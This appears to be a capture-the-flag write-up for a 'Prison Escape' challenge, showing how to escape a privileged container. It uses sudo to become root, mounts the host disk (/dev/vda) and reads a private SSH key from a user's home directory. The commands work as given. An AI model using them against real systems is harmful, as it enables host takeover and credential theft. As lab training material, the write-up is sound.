Skip to content

Prison Escape

Prison Escape                                          Elfen Ring                                          A picture containing clipart Description automatically generatedTinsel Upatree

A picture containing timeline Description automatically generated

Graphical user interface, text Description automatically generated

Hint from Bow Ninecandle
1) Were you able to mount up? If so, users' home/ directories can be a great place to look for secrets...
2) When users are over-privileged, they can often act as root. When containers have too many permissions, they can affect the host!

We can escalate to root using sudo

 
sudo -l
sudo -i 
whoami

Text Description automatically generated

The container is running in privileged mode. So we can run the below to list disk partitions on the host.

 
fdisk -l

Text Description automatically generated

 

Make a folder under /mnt and mount /dev/vda to it

 
mkdir /mnt/host_drive
mount /dev/vda /mnt/host_drive

The host partition is mounted successfully, and we can see the file jail.key.priv in the /home/jailer/.ssh directory 

ls /mnt/host_drive/home -lR -lah

Read the contents of the file jail.key.priv.

cat /mnt/host_drive/home/jailer/ssh/jail.key.priv

Text Description automatically generated

Answer : 082bb339ec19de4935867

The objective is now completed
and we get 25 coins as well